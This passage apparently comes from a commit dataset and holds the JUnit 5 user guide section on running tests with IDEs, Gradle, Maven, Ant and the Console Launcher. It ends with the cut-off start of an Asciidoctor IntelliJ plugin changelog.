when\n<<writing-tests-parallel-execution, executing tests in parallel>> it would be impossible\nto attribute it to a specific test or container.\n\nWARNING: Capturing output is currently an _experimental_ feature. You're invited to give\nit a try and provide feedback to the JUnit team so they can improve and eventually\n<<api-evolution, promote>> this feature.\n","old_contents":"[[running-tests]]\n== Running Tests\n\n[[running-tests-ide]]\n=== IDE Support\n\n[[running-tests-ide-intellij-idea]]\n==== IntelliJ IDEA\n\nIntelliJ IDEA supports running tests on the JUnit Platform since version 2016.2. For\ndetails please see the\nhttps:\/\/blog.jetbrains.com\/idea\/2016\/08\/using-junit-5-in-intellij-idea\/[post on the\nIntelliJ IDEA blog]. Note, however, that it is recommended to use IDEA 2017.3 or newer\nsince these newer versions of IDEA will download the following JARs automatically based\non the API version used in the project: `junit-platform-launcher`,\n`junit-jupiter-engine`, and `junit-vintage-engine`.\n\nWARNING: IntelliJ IDEA releases prior to IDEA 2017.3 bundle specific versions of JUnit 5.\nThus, if you want to use a newer version of JUnit Jupiter, execution of tests within the\nIDE might fail due to version conflicts. In such cases, please follow the instructions\nbelow to use a newer version of JUnit 5 than the one bundled with IntelliJ IDEA.\n\nIn order to use a different JUnit 5 version (e.g., {jupiter-version}), you may need to\ninclude the corresponding versions of the `junit-platform-launcher`,\n`junit-jupiter-engine`, and `junit-vintage-engine` JARs in the classpath.\n\n.Additional Gradle Dependencies\n[source,groovy]\n[subs=attributes+]\n----\n\/\/ Only needed to run tests in a version of IntelliJ IDEA that bundles older versions\ntestRuntime(\"org.junit.platform:junit-platform-launcher:{platform-version}\")\ntestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\ntestRuntime(\"org.junit.vintage:junit-vintage-engine:{vintage-version}\")\n----\n\n.Additional Maven Dependencies\n[source,xml]\n[subs=attributes+]\n----\n<!-- Only needed to run tests in a version of IntelliJ IDEA that bundles older versions -->\n<dependency>\n\t<groupId>org.junit.platform<\/groupId>\n\t<artifactId>junit-platform-launcher<\/artifactId>\n\t<version>{platform-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n<dependency>\n\t<groupId>org.junit.jupiter<\/groupId>\n\t<artifactId>junit-jupiter-engine<\/artifactId>\n\t<version>{jupiter-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n<dependency>\n\t<groupId>org.junit.vintage<\/groupId>\n\t<artifactId>junit-vintage-engine<\/artifactId>\n\t<version>{vintage-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n----\n\n[[running-tests-ide-eclipse]]\n==== Eclipse\n\nEclipse IDE offers support for the JUnit Platform since the Eclipse Oxygen.1a (4.7.1a)\nrelease.\n\nFor more information on using JUnit 5 in Eclipse consult the official _Eclipse support\nfor JUnit 5_ section of the\nhttps:\/\/www.eclipse.org\/eclipse\/news\/4.7.1a\/#junit-5-support[Eclipse Project Oxygen.1a\n(4.7.1a) - New and Noteworthy] documentation.\n\n[[running-tests-ide-other]]\n==== Other IDEs\n\nAt the time of this writing, there is no direct support for running tests on the JUnit\nPlatform within IDEs other than IntelliJ IDEA and Eclipse. However, the JUnit team\nprovides two intermediate solutions so that you can go ahead and try out JUnit 5 within\nyour IDE today. You can use the <<running-tests-console-launcher>> manually or execute\ntests with a <<running-tests-junit-platform-runner,JUnit 4 based Runner>>.\n\n[[running-tests-build]]\n=== Build Support\n\n[[running-tests-build-gradle]]\n==== Gradle\n\nStarting with https:\/\/docs.gradle.org\/4.6\/release-notes.html[version 4.6], Gradle provides\nhttps:\/\/docs.gradle.org\/current\/userguide\/java_testing.html#using_junit5[native support]\nfor executing tests on the JUnit Platform. To enable it, you just need to specify\n`useJUnitPlatform()` within a `test` task declaration in `build.gradle`:\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n useJUnitPlatform()\n}\n----\n\nFiltering by tags or engines is also supported:\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n useJUnitPlatform {\n includeTags 'fast', 'smoke & feature-a'\n \/\/ excludeTags 'slow', 'ci'\n includeEngines 'junit-jupiter'\n \/\/ excludeEngines 'junit-vintage'\n\t}\n}\n----\n\nPlease refer to the\nhttps:\/\/docs.gradle.org\/current\/userguide\/java_plugin.html#sec:java_test[official Gradle documentation]\nfor a comprehensive list of options.\n\n[WARNING]\n.The JUnit Platform Gradle Plugin has been discontinued\n====\nThe very basic `junit-platform-gradle-plugin` developed by the JUnit team was deprecated\nin JUnit Platform 1.2 and discontinued in 1.3. Please switch to Gradle's standard `test`\ntask.\n====\n\n[[running-tests-build-gradle-config-params]]\n===== Configuration Parameters\n\nThe standard Gradle `test` task currently does not provide a dedicated DSL to set JUnit\nPlatform <<running-tests-config-params, configuration parameters>> to influence test\ndiscovery and execution. However, you can provide configuration parameters within the\nbuild script via system properties (as shown below) or via the\n`junit-platform.properties` file.\n\n[source,java,indent=0]\n----\ntest {\n\t\/\/ ...\n\tsystemProperty 'junit.jupiter.conditions.deactivate', '*'\n\tsystemProperties = [\n\t\t'junit.jupiter.extensions.autodetection.enabled': 'true',\n\t\t'junit.jupiter.testinstance.lifecycle.default': 'per_class'\n\t]\n\t\/\/ ...\n}\n----\n\n[[running-tests-build-gradle-engines-configure]]\n===== Configuring Test Engines\n\nIn order to run any tests at all, a `TestEngine` implementation must be on the classpath.\n\nTo configure support for JUnit Jupiter based tests, configure a `testCompile` dependency\non the JUnit Jupiter API and a `testRuntime` dependency on the JUnit Jupiter `TestEngine`\nimplementation similar to the following.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ndependencies {\n\ttestCompile(\"org.junit.jupiter:junit-jupiter-api:{jupiter-version}\")\n\ttestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\n}\n----\n\nThe JUnit Platform can run JUnit 4 based tests as long as you configure a `testCompile`\ndependency on JUnit 4 and a `testRuntime` dependency on the JUnit Vintage `TestEngine`\nimplementation similar to the following.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ndependencies {\n\ttestCompile(\"junit:junit:{junit4-version}\")\n\ttestRuntime(\"org.junit.vintage:junit-vintage-engine:{vintage-version}\")\n}\n----\n\n[[running-tests-build-gradle-logging]]\n===== Configuring Logging (optional)\n\nJUnit uses the Java Logging APIs in the `java.util.logging` package (a.k.a. _JUL_) to\nemit warnings and debug information. Please refer to the official documentation of\n`{LogManager}` for configuration options.\n\nAlternatively, it's possible to redirect log messages to other logging frameworks such as\n{Log4j} or {Logback}. To use a logging framework that provides a custom implementation of\n`{LogManager}`, set the `java.util.logging.manager` system property to the _fully\nqualified class name_ of the `{LogManager}` implementation to use. The example below\ndemonstrates how to configure Log4j{nbsp}2.x (see {Log4j_JDK_Logging_Adapter} for\ndetails).\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n\tsystemProperty 'java.util.logging.manager', 'org.apache.logging.log4j.jul.LogManager'\n}\n----\n\nOther logging frameworks provide different means to redirect messages logged using\n`java.util.logging`. For example, for {Logback} you can use the\nhttps:\/\/www.slf4j.org\/legacy.html#jul-to-slf4j[JUL to SLF4J Bridge] by adding an\nadditional dependency to the runtime classpath.\n\n[[running-tests-build-maven]]\n==== Maven\n\nNOTE: Starting with https:\/\/issues.apache.org\/jira\/browse\/SUREFIRE-1330[version 2.22.0],\nMaven Surefire provides\nhttp:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/junit-platform.html[native support]\nfor executing tests on the JUnit Platform. The `pom.xml` file in the\n`{junit5-jupiter-starter-maven}` project demonstrates how to use the native support and\ncan serve as a starting point for configuring your Maven build.\n\nThe JUnit team has developed a basic provider for Maven Surefire that lets you run JUnit\n4 and JUnit Jupiter tests via `mvn test` on versions of Maven Surefire prior to 2.22.0.\nDue to the release of Surefire 2.22.0, the `junit-platform-surefire-provider` from the\nJUnit team has been deprecated and will be discontinued in a subsequent release of the\nJUnit Platform.\n\nNOTE: Please use Maven Surefire {surefire-version} with the\n`junit-platform-surefire-provider`.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<dependencies>\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.platform<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-platform-surefire-provider<\/artifactId>\n\t\t\t\t\t\t<version>{platform-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-maven-engines-configure]]\n===== Configuring Test Engines\n\nIn order to have Maven Surefire run any tests at all, a `TestEngine` implementation must\nbe added to the runtime classpath.\n\nTo configure support for JUnit Jupiter based tests, configure a `test` dependency on the\nJUnit Jupiter API, and add the JUnit Jupiter `TestEngine` implementation to the\ndependencies of the `maven-surefire-plugin` similar to the following.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<dependencies>\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.platform<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-platform-surefire-provider<\/artifactId>\n\t\t\t\t\t\t<version>{platform-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.jupiter<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-jupiter-engine<\/artifactId>\n\t\t\t\t\t\t<version>{jupiter-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>org.junit.jupiter<\/groupId>\n\t\t\t<artifactId>junit-jupiter-api<\/artifactId>\n\t\t\t<version>{jupiter-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t<\/dependencies>\n\t...\n----\n\nThe JUnit Platform Surefire Provider can run JUnit 4 based tests as long as you configure\na `test` dependency on JUnit 4 and add the JUnit Vintage `TestEngine` implementation to\nthe dependencies of the `maven-surefire-plugin` similar to the following.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<dependencies>\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.platform<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-platform-surefire-provider<\/artifactId>\n\t\t\t\t\t\t<version>{platform-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t\t...\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.vintage<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-vintage-engine<\/artifactId>\n\t\t\t\t\t\t<version>{vintage-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>junit<\/groupId>\n\t\t\t<artifactId>junit<\/artifactId>\n\t\t\t<version>{junit4-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t<\/dependencies>\n\t...\n----\n\n[[running-tests-build-maven-test-system-property]]\n===== Running a Single Test Class\n\nThe JUnit Platform Surefire Provider supports the `test` JVM system property supported by\nthe Maven Surefire Plugin. For example, to run only test methods in the\n`org.example.MyTest` test class you can execute `mvn -Dtest=org.example.MyTest test` from\nthe command line. For further details, consult the\nhttps:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/single-test.html[Maven Surefire Plugin]\ndocumentation.\n\n[[running-tests-build-maven-filter-test-class-names]]\n===== Filtering by Test Class Names\n\nThe Maven Surefire Plugin will scan for test classes whose fully qualified names match\nthe following patterns.\n\n- `+**\/Test*.java+`\n- `+**\/*Test.java+`\n- `+**\/*Tests.java+`\n- `+**\/*TestCase.java+`\n\nMoreover, it will exclude all nested classes (including static member classes) by default.\n\nNote, however, that you can override this default behavior by configuring explicit\n`include` and `exclude` rules in your `pom.xml` file. For example, to keep Maven Surefire\nfrom excluding static member classes, you can override its exclude rules.\n\n[source,xml,indent=0]\n[subs=attributes+]\n.Overriding exclude rules of Maven Surefire\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<excludes>\n\t\t\t\t\t\t<exclude\/>\n\t\t\t\t\t<\/excludes>\n\t\t\t\t<\/configuration>\n\t\t\t\t...\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\nPlease see the\nhttps:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/inclusion-exclusion.html[Inclusions and Exclusions of Tests]\ndocumentation for Maven Surefire for details.\n\n[[running-tests-build-maven-filter-tags]]\n===== Filtering by Tags\n\nYou can filter tests by tags or <<running-tests-tag-expressions, tag expressions>> using\nthe following configuration properties.\n\n- to include _tags_ or _tag expressions_, use either `groups` or `includeTags`.\n- to exclude _tags_ or _tag expressions_, use either `excludedGroups` or `excludeTags`.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t <properties>\n\t\t\t <includeTags>acceptance | !feature-a<\/includeTags>\n\t\t\t <excludeTags>integration, regression<\/excludeTags>\n\t\t\t <\/properties>\n\t\t\t <\/configuration>\n\t\t\t\t<dependencies>\n\t\t\t\t\t...\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-maven-config-params]]\n===== Configuration Parameters\n\nYou can set JUnit Platform <<running-tests-config-params, configuration parameters>> to\ninfluence test discovery and execution by declaring the `configurationParameters`\nproperty and providing key-value pairs using the Java `Properties` file syntax (as shown\nbelow) or via the `junit-platform.properties` file.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<properties>\n\t\t\t\t\t\t<configurationParameters>\n\t\t\t\t\t\t\tjunit.jupiter.conditions.deactivate = *\n\t\t\t\t\t\t\tjunit.jupiter.extensions.autodetection.enabled = true\n\t\t\t\t\t\t\tjunit.jupiter.testinstance.lifecycle.default = per_class\n\t\t\t\t\t\t<\/configurationParameters>\n\t\t\t\t\t<\/properties>\n\t\t\t\t<\/configuration>\n\t\t\t\t<dependencies>\n\t\t\t\t\t...\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-ant]]\n==== Ant\n\nStarting with version `1.10.3` of link:https:\/\/ant.apache.org\/[Ant], a new\nlink:https:\/\/ant.apache.org\/manual\/Tasks\/junitlauncher.html[`junitlauncher`] task has\nbeen introduced to provide native support for launching tests on the JUnit Platform. The\n`junitlauncher` task is solely responsible for launching the JUnit Platform and passing\nit the selected collection of tests. The JUnit Platform then delegates to registered test\nengines to discover and execute the tests.\n\nThe `junitlauncher` task attempts to align as close as possible with native Ant\nconstructs such as\nlink:https:\/\/ant.apache.org\/manual\/Types\/resources.html#collection[resource collections]\nfor allowing users to select the tests that they want executed by test engines. This\ngives the task a consistent and natural feel when compared to many other core Ant tasks.\n\nNOTE: The version of the `junitlauncher` task shipped in Ant 1.10.3 provides basic,\nminimal support for launching the JUnit Platform. Additional enhancements (including\nsupport for forking the tests in a separate JVM) will be available in subsequent releases\nof Ant.\n\nThe `build.xml` file in the `{junit5-jupiter-starter-ant}` project demonstrates how to use\nit and can serve as a starting point.\n\n===== Basic Usage\n\nThe following example demonstrates how to configure the `junitlauncher` task to select a\nsingle test class (i.e., `org.myapp.test.MyFirstJUnit5Test`).\n\n[source,xml,indent=0]\n----\n\t<path id=\"test.classpath\">\n\t\t<!-- The location where you have your compiled classes -->\n\t\t<pathelement location=\"${build.classes.dir}\" \/>\n\t<\/path>\n\n\t<!-- ... -->\n\n\t<junitlauncher>\n\t\t<classpath refid=\"test.classpath\" \/>\n\t\t<test name=\"org.myapp.test.MyFirstJUnit5Test\" \/>\n\t<\/junitlauncher>\n----\n\nThe `test` element allows you to specify a single test class that you want to be selected\nand executed. The `classpath` element allows you to specify the classpath to be used to\nlaunch the JUnit Platform. This classpath will also be used to locate test classes that\nare part of the execution.\n\nThe following example demonstrates how to configure the `junitlauncher` task to select\ntest classes from multiple locations.\n\n[source,xml,indent=0]\n----\n\t<path id=\"test.classpath\">\n\t\t<!-- The location where you have your compiled classes -->\n\t\t<pathelement location=\"${build.classes.dir}\" \/>\n\t<\/path>\n\t....\n\t<junitlauncher>\n\t\t<classpath refid=\"test.classpath\" \/>\n\t\t<testclasses outputdir=\"${output.dir}\">\n\t\t\t<fileset dir=\"${build.classes.dir}\">\n\t\t\t\t<include name=\"org\/example\/**\/demo\/**\/\" \/>\n\t\t\t<\/fileset>\n\t\t\t<fileset dir=\"${some.other.dir}\">\n\t\t\t\t<include name=\"org\/myapp\/**\/\" \/>\n\t\t\t<\/fileset>\n\t\t<\/testclasses>\n\t<\/junitlauncher>\n----\n\nIn the above example, the `testclasses` element allows you to select multiple test\nclasses that reside in different locations.\n\nFor further details on usage and configuration options please refer to the official Ant\ndocumentation for the\nlink:https:\/\/ant.apache.org\/manual\/Tasks\/junitlauncher.html[`junitlauncher` task].\n\n[[running-tests-console-launcher]]\n=== Console Launcher\n\nThe `{ConsoleLauncher}` is a command-line Java application that lets you launch the JUnit\nPlatform from the console. For example, it can be used to run JUnit Vintage and JUnit\nJupiter tests and print test execution results to the console.\n\nAn executable `junit-platform-console-standalone-{platform-version}.jar` with all\ndependencies included is published in the central Maven repository under the\nhttps:\/\/repo1.maven.org\/maven2\/org\/junit\/platform\/junit-platform-console-standalone[junit-platform-console-standalone]\ndirectory. You can https:\/\/docs.oracle.com\/javase\/tutorial\/deployment\/jar\/run.html[run] the\nstandalone `ConsoleLauncher` as shown below.\n\n`java -jar junit-platform-console-standalone-{platform-version}.jar <<<running-tests-console-launcher-options>>>`\n\nHere's an example of its output:\n\n....\n\u251c\u2500 JUnit Vintage\n\u2502 \u2514\u2500 example.JUnit4Tests\n\u2502 \u2514\u2500 standardJUnit4Test \u2714\n\u2514\u2500 JUnit Jupiter\n \u251c\u2500 StandardTests\n \u2502 \u251c\u2500 succeedingTest() \u2714\n \u2502 \u2514\u2500 skippedTest() \u21b7 for demonstration purposes\n \u2514\u2500 A special test case\n \u251c\u2500 Custom test name containing spaces \u2714\n \u251c\u2500 \u256f\u00b0\u25a1\u00b0\uff09\u256f \u2714\n \u2514\u2500 \ud83d\ude31 \u2714\n\nTest run finished after 64 ms\n[ 5 containers found ]\n[ 0 containers skipped ]\n[ 5 containers started ]\n[ 0 containers aborted ]\n[ 5 containers successful ]\n[ 0 containers failed ]\n[ 6 tests found ]\n[ 1 tests skipped ]\n[ 5 tests started ]\n[ 0 tests aborted ]\n[ 5 tests successful ]\n[ 0 tests failed ]\n....\n\n.Exit Code\nNOTE: The `{ConsoleLauncher}` exits with a status code of `1` if any containers or tests\nfailed. If no tests are discovered and the `--fail-if-no-tests` command-line option is\nsupplied, the `ConsoleLauncher` exits with a status code of `2`. Otherwise the exit code\nis `0`.\n\n[[running-tests-console-launcher-options]]\n==== Options\n\n----\ninclude::{consoleLauncherOptionsFile}[]\n----\n\n[[running-tests-console-launcher-argument-files]]\n==== Argument Files (@-files)\n\nOn some platforms you may run into system limitations on the length of a command line\nwhen creating a command line with lots of options or with long arguments.\n\nSince version 1.3, the `ConsoleLauncher` supports _argument files_, also known as\n_@-files_. Argument files are files that themselves contain arguments to be passed to the\ncommand. When the underlying https:\/\/github.com\/remkop\/picocli[picocli] command line\nparser encounters an argument beginning with the character `@`, it expands the contents\nof that file into the argument list.\n\nThe arguments within a file can be separated by spaces or newlines. If an argument\ncontains embedded whitespace, the whole argument should be wrapped in double or single\nquotes -- for example, `\"-f=My Files\/Stuff.java\"`.\n\nIf the argument file does not exist or cannot be read, the argument will be treated\nliterally and will not be removed. This will likely result in an \"unmatched argument\"\nerror message. You can troubleshoot such errors by executing the command with the\n`picocli.trace` system property set to `DEBUG`.\n\nMultiple _@-files_ may be specified on the command line. The specified path may be\nrelative to the current directory or absolute.\n\nYou can pass a real parameter with an initial `@` character by escaping it with an\nadditional `@` symbol. For example, `@@somearg` will become `@somearg` and will not be\nsubject to expansion.\n\n\n[[running-tests-junit-platform-runner]]\n=== Using JUnit 4 to run the JUnit Platform\n\nThe `JUnitPlatform` runner is a JUnit 4 based `Runner` which enables you to run any test\nwhose programming model is supported on the JUnit Platform in a JUnit 4 environment --\nfor example, a JUnit Jupiter test class.\n\nAnnotating a class with `@RunWith(JUnitPlatform.class)` allows it to be run with IDEs and\nbuild systems that support JUnit 4 but do not yet support the JUnit Platform directly.\n\nNOTE: Since the JUnit Platform has features that JUnit 4 does not have, the runner is\nonly able to support a subset of the JUnit Platform functionality, especially with regard\nto reporting (see <<running-tests-junit-platform-runner-technical-names>>). But for the\ntime being the `JUnitPlatform` runner is an easy way to get started.\n\n[[running-tests-junit-platform-runner-setup]]\n==== Setup\n\nYou need the following artifacts and their dependencies on the classpath. See\n<<dependency-metadata>> for details regarding group IDs, artifact IDs, and versions.\n\n===== Explicit Dependencies\n\n* `junit-platform-runner` in _test_ scope: location of the `JUnitPlatform` runner\n* `junit-{junit4-version}.jar` in _test_ scope: to run tests using JUnit 4\n* `junit-jupiter-api` in _test_ scope: API for writing tests using JUnit Jupiter, including `@Test`, etc.\n* `junit-jupiter-engine` in _test runtime_ scope: implementation of the `TestEngine` API for JUnit Jupiter\n\n===== Transitive Dependencies\n\n* `junit-platform-suite-api` in _test_ scope\n* `junit-platform-launcher` in _test_ scope\n* `junit-platform-engine` in _test_ scope\n* `junit-platform-commons` in _test_ scope\n* `opentest4j` in _test_ scope\n\n[[running-tests-junit-platform-runner-technical-names]]\n==== Display Names vs. Technical Names\n\nTo define a custom _display name_ for the class run via `@RunWith(JUnitPlatform.class)`\nsimply annotate the class with `@SuiteDisplayName` and provide a custom value.\n\nBy default, _display names_ will be used for test artifacts; however, when the\n`JUnitPlatform` runner is used to execute tests with a build tool such as Gradle or\nMaven, the generated test report often needs to include the _technical names_ of test\nartifacts \u2014 for example, fully qualified class names \u2014 instead of shorter display names\nlike the simple name of a test class or a custom display name containing special\ncharacters. To enable technical names for reporting purposes, simply declare the\n`@UseTechnicalNames` annotation alongside `@RunWith(JUnitPlatform.class)`.\n\nNote that the presence of `@UseTechnicalNames` overrides any custom display name\nconfigured via `@SuiteDisplayName`.\n\n[[running-tests-junit-platform-runner-single-test]]\n==== Single Test Class\n\nOne way to use the `JUnitPlatform` runner is to annotate a test class with\n`@RunWith(JUnitPlatform.class)` directly. Please note that the test methods in the\nfollowing example are annotated with `org.junit.jupiter.api.Test` (JUnit Jupiter), not\n`org.junit.Test` (JUnit Vintage). Moreover, in this case the test class must be `public`;\notherwise, some IDEs and build tools might not recognize it as a JUnit 4 test class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/JUnit4ClassDemo.java[tags=user_guide]\n----\n\n[[running-tests-junit-platform-runner-test-suite]]\n==== Test Suite\n\nIf you have multiple test classes you can create a test suite as can be seen in the\nfollowing example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/JUnit4SuiteDemo.java[tags=user_guide]\n----\n\nThe `JUnit4SuiteDemo` will discover and run all tests in the `example` package\nand its subpackages. By default, it will only include test classes whose names\neither begin with `Test` or end with `Test` or `Tests`.\n\n.Additional Configuration Options\nNOTE: There are more configuration options for discovering and filtering tests than just\n`@SelectPackages`. Please consult the\n{javadoc-root}\/org\/junit\/platform\/suite\/api\/package-summary.html[Javadoc] for further\ndetails.\n\n[[running-tests-config-params]]\n=== Configuration Parameters\n\nIn addition to instructing the platform which test classes and test engines to include,\nwhich packages to scan, etc., it is sometimes necessary to provide additional custom\nconfiguration parameters that are specific to a particular test engine or registered\nextension. For example, the JUnit Jupiter `TestEngine` supports _configuration\nparameters_ for the following use cases.\n\n- <<writing-tests-test-instance-lifecycle-changing-default>>\n- <<extensions-registration-automatic-enabling>>\n- <<extensions-conditions-deactivation>>\n\n_Configuration Parameters_ are text-based key-value pairs that can be supplied to test\nengines running on the JUnit Platform via one of the following mechanisms.\n\n1. The `configurationParameter()` and `configurationParameters()` methods in the\n `LauncherDiscoveryRequestBuilder` which is used to build a request supplied to the\n <<launcher-api, `Launcher` API>>. When running tests via one of the tools provided\n by the JUnit Platform you can specify configuration parameters as follows:\n * <<running-tests-console-launcher,Console Launcher>>: use the `--config`\n command-line option.\n * <<running-tests-build-gradle-config-params,Gradle>>: use the\n `systemProperty` or `systemProperties` DSL.\n * <<running-tests-build-maven-config-params,Maven Surefire provider>>: use the\n `configurationParameters` property.\n2. JVM system properties.\n3. The JUnit Platform configuration file: a file named `junit-platform.properties` in the\n root of the class path that follows the syntax rules for a Java `Properties` file.\n\nNOTE: Configuration parameters are looked up in the exact order defined above.\nConsequently, configuration parameters supplied directly to the `Launcher` take\nprecedence over those supplied via system properties and the configuration file.\nSimilarly, configuration parameters supplied via system properties take precedence over\nthose supplied via the configuration file.\n\n[[running-tests-tag-expressions]]\n=== Tag Expressions\nTag expressions are boolean expressions with the operators `!`, `&` and `|`. In addition,\n`(` and `)` can be used to adjust for operator precedence.\n\n.Operators (in descending order of precedence)\n|===\n| Operator | Meaning | Associativity\n\n| `!` | not | right\n| `&` | and | left\n| `\\|` | or | left\n|===\n\nIf you are tagging your tests across multiple dimensions, tag expressions help you to\nselect which tests to execute. Tagging by test type (e.g. _micro_, _integration_,\n_end-to-end_) and feature (e.g. *foo*, *bar*, *baz*) the following tag expressions can be\nuseful.\n\n[%header,cols=\"40,60\"]\n|===\n| Tag Expression\n| Selection\n\n| +foo+\n| all tests for *foo*\n\n| +bar \\| baz+\n| all tests for *bar* plus all tests for *baz*\n\n| +bar & baz+\n| all tests for the intersection between *bar* and *baz*\n\n| +foo & !end-to-end+\n| all tests for *foo*, but not the _end-to-end_ tests\n\n| +(micro \\| integration) & (foo \\| baz)+\n| all _micro_ or _integration_ tests for *foo* or *baz*\n|===\n\n[[running-tests-capturing-output]]\n=== Capturing Standard Output\/Error\n\nSince version 1.3, the JUnit Platform provides opt-in support for capturing output\nprinted to `System.out` and `System.err`. To enable it, simply set the\n`junit.platform.output.capture.stdout` and\/or `junit.platform.output.capture.stderr`\n<<running-tests-config-params, configuration parameter>> to `true`. In addition, you may\nconfigure the maximum number of buffered bytes to be used per executed test or container\nusing `junit.platform.output.capture.maxBuffer`.\n\nIf enabled, the JUnit Platform captures the corresponding output and publishes it as a\nreport entry using the `stdout` or `stderr` keys to all registered\n`{TestExecutionListener}` instances immediately before reporting the test or container as\nfinished.\n\nPlease note that the captured output will only contain output emitted by the thread that\nwas used to execute a container or test. Any output by other threads will be omitted\nbecause particularly when\n<<writing-tests-parallel-execution, executing tests in parallel>> it would be impossible\nto attribute it to a specific test or container.\n\nWARNING: Capturing output is currently an _experimental_ feature. You're invited to give\nit a try and provide feedback to the JUnit team so they can improve and eventually\n<<api-evolution, promote>> this feature.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"14e2eb93b770f8ea5b63de4b44fa55662b8b01d6","subject":"updated changelog","message":"updated changelog\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"= Asciidoctor IntelliJ Plugin Changelog\n\n== About\n\nThis document provides a high-level view of the changes introduced by release.\n\n[[releasenotes]]\n== Release notes\n\n=== 0.29.x (work in progress)\n\n- improve handling of emails and links in editor (#307)\n\n=== 0.28.25\n\n- security review for in-browser preview, adding mac to prevent browser to retrieve arbitrary file, hiding referrer from externally retrieved resources (#303)\n\n=== 0.28.24 (preview, available from Github releases)\n\n- support undo for paste-image and send out notifications to add files to VCS (#298)\n- fix rendering of images in flicker-free fast preview (#241)\n- prevent NPE when opening AsciiDoc documents or fragments in browser (#303)\n- inspection to convert Markdown-style horizontal rules to AsciiDoc-style horizontal rules (thanks to @bbrenne) (#272, #302)\n\n=== 0.28.23 (preview, available from Github releases)\n\n- Paste image from clipboard (thanks to @bbrenne) (#298, #300)\n\n=== 0.28.22\n\n- Wrong test name in gutter when running tests, BrowserUrlProvider eagerly works on all files (#301)\n\n=== 0.28.21\n\n- fixing autocomplete for link: when brackets already provided\n- avoid flickering Math preview by replacing 